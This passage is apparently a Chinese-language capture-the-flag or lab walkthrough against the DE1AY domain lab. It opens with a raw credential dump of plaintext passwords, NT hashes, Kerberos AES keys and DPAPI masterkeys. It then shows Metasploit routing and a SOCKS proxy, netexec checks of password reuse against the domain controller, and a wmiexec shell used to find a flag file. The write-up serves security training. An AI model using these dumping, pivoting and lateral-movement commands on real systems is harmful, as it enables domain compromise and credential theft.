(hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51 AES128 Key: c2ad29b45ce46e659d7eac123b4f383c AES256 Key: 422def051140f548715927715e1c5a1e81af74e316d21ba965d8a3fdcee3e21b == WDIGEST [3e4]== username WEB$ domainname DE1AY password cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51 password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51 == LogonSession == authentication_id 49346 (c0c2) session_id 0 username domainname logon_server logon_time 2026-03-31T03:25:16.868841+00:00 sid None luid 49346 == MSV == Username: WEB$ Domain: DE1AY LM: NA NT: c2ad29b45ce46e659d7eac123b4f383c SHA1: 62fc725c3e7e366b9517431e3473badeb0fb7819 DPAPI: NA == Orphaned credentials == == WDIGEST [ced3f]== username WEB$ domainname DE1AY password cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51 password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51 == WDIGEST [1c2ef]== username Administrator domainname WEB password 1qaz@WSX password (hex)3100710061007a004000570053005800 == WDIGEST [3e7]== username WEB$ domainname DE1AY password cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51 password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51 == Kerberos == Username: Administrator Domain: WEB Password: 1qaz@WSX password (hex)3100710061007a004000570053005800 AES128 Key: 161cff084477fe596a5db81874498a24 == Kerberos == Username: Domain: == Kerberos == Username: web$ Domain: DE1AY.COM Password: cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51 password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51 AES128 Key: c2ad29b45ce46e659d7eac123b4f383c AES256 Key: 422def051140f548715927715e1c5a1e81af74e316d21ba965d8a3fdcee3e21b == Kerberos == Username: WEB$ Domain: de1ay.com Password: cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51 password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51 AES128 Key: c2ad29b45ce46e659d7eac123b4f383c == TSPKG [1c2ef]== username Administrator domainname WEB password 1qaz@WSX password (hex)3100710061007a004000570053005800 == TSPKG [ced3f]== username WEB$ domainname DE1AY password cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51 password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51 == DPAPI [1c2ef]== luid 115439 key_guid cf6375e9-cb73-403c-85c1-1f8c0fd40713 masterkey 6d31defa2d59070dbf24673f3ee89c4600677bf9e792ed8b3dea0595631934f80bcd31b2ad93639e8b68b562b3e3b89516b6b94f5ca3dbb4da0e28782bdcbc1b sha1_masterkey b911d3809e6562b85db1df179dbfb7808287e08e == DPAPI [3e7]== luid 999 key_guid ca77cbfd-8261-40b9-8d5c-0f41ebe094a6 masterkey 357094262b63cf3190a4a82aaa429a04099645ed42284af9caf50045b82ff2692bd8b36135c284fd2225c90a282014fac614efedd1a577bea80ce3f6a26cab60 sha1_masterkey 8f3d523b12ef2d2d75694c8ac6a9f468b2147a8b == DPAPI [3e7]== luid 999 key_guid 874982d1-e64a-46e2-8434-37fcb44b2d95 masterkey 1c54c8bfce93778015b7bc92de6253fc237d18242e0458dd822cb3f32aa4de95cf185021f73924705564e9fd273ec3d1025704b9b9aaca75bc2bfd68e3db2411 sha1_masterkey 39cd11d60c21c759180576142d233a520e7e5a5b == DPAPI [3e7]== luid 999 key_guid f13057c0-8c1b-48c4-80ee-09c0eb097cae masterkey 82277b34d9a3147b63dfac2f2bc47e08ad32657220af7dc707bc81d62f47178e988e8cbf4898d1659ef735a8352b78254f4cfe851df64caac4dab70f01e543b5 sha1_masterkey c4b06d1dbea1a9c5d87ed05dfff96ae4c2d27cee == DPAPI [3e7]== luid 999 key_guid 5ef855ab-943b-4302-bbda-8846492bd228 masterkey 9bdfbcbdce5c4b728874d2f93ae45b2044d464c665b383ea996cfa6b74cb63b9938ea70aa8dcb9ab02fdc566e60d2200a9d5adb2dce54e06d9039fb7465c2797 sha1_masterkey 4c6d5a4bc1991ce5aedc0888f9ac9c5158236bb4 == DPAPI [3e7]== luid 999 key_guid f07d31a0-5b8c-4a4c-8482-8808d16cafb1 masterkey d955b8244772d8d34aa302e14084d06b86a6311ef7845541863288694f9b7aaa621279b5605daa2e5722e28fac9fa30d2c8b2f623dae4847d2e445cfa219ae6f sha1_masterkey 7a0ee6c0e59730442acde4d5c96f9ab9afedcc53 == DPAPI [3e7]== luid 999 key_guid 43ea2159-28dc-4507-90bd-751f19e7db5d masterkey cc412391998e555e76bfa10964c792fd675b037dec9c5be3b9456db4f5eb64022c0698d6960de4c0a8aca21586f5b445bf490c4a392014721636be5c5f75a3f8 sha1_masterkey 56b3c08a69e9c1a346e35fa4cb572b70cf5a158e
可以发现:
DE1AY\mssql 的密码为 1qaz@WSX
WEB\Administrator 的密码为 1qaz@WSX
虽然没直接抓到域控的信息,但是我们可以合理怀疑域控是否也用了同样的密码。
3、路由和代理 先通过之前的 MSF Session 建立路由和代理,以便后续攻击机上的工具可以直接对域控使用:
msf > route add 10.10.10.0/24 1 msf > use auxiliary/server/socks_proxy msf > set SRVHOST 127.0.0.1 msf > set SRVPORT 1080 msf > set VERSION 5 msf > run -j
编辑 proxychains 的配置文件:
sudo vim /etc/proxychains4.conf
找到文件末尾的 [ProxyList] 部分,将内容修改为自己配置的:
4、验证密码复用 用 SMB 协议进行验证:
netexec smb 10.10.10.10 -u Administrator -p '1qaz@WSX' -d DE1AY
输出:
SMB 10.10.10.10 445 DC [+] DE1AY\Administrator:1qaz@WSX (Pwn3d!)
[+] DE1AY\Administrator:1qaz@WSX 说明密码复用确实存在(Pwn3d!) 表示具有管理员权限
5、获取 Shell 用工具 wmiexec:
proxychains python3 /usr/share/doc/python3-impacket/examples/wmiexec.py DE1AY/Administrator:'1qaz@WSX' @10.10.10.10 -codec gbk
-codec gbk 能解决乱码的问题。
成功获取 Shell 之后,读取根目录下的 flag 文件:
C:\>dir 驱动器 C 中的卷没有标签。 卷的序列号是 92FD-8733 C:\ 的目录 2019/09/08 18:57 <DIR> 101cde781c961a208b 2025/09/02 06:53 25 flag.txt.txt 2013/08/22 23:52 <DIR> PerfLogs 2013/08/22 22:50 <DIR> Program Files 2013/08/22 23:39 <DIR> Program Files (x86) 2019/09/09 10:47 <DIR> Users 2026/03/31 10:05 <DIR> Windows 2025/09/02 06:50 <DIR> 新建文件夹 1 个文件 25 字节 7 个目录 54,923,354,112 可用字节 C:\>type flag.txt.txt
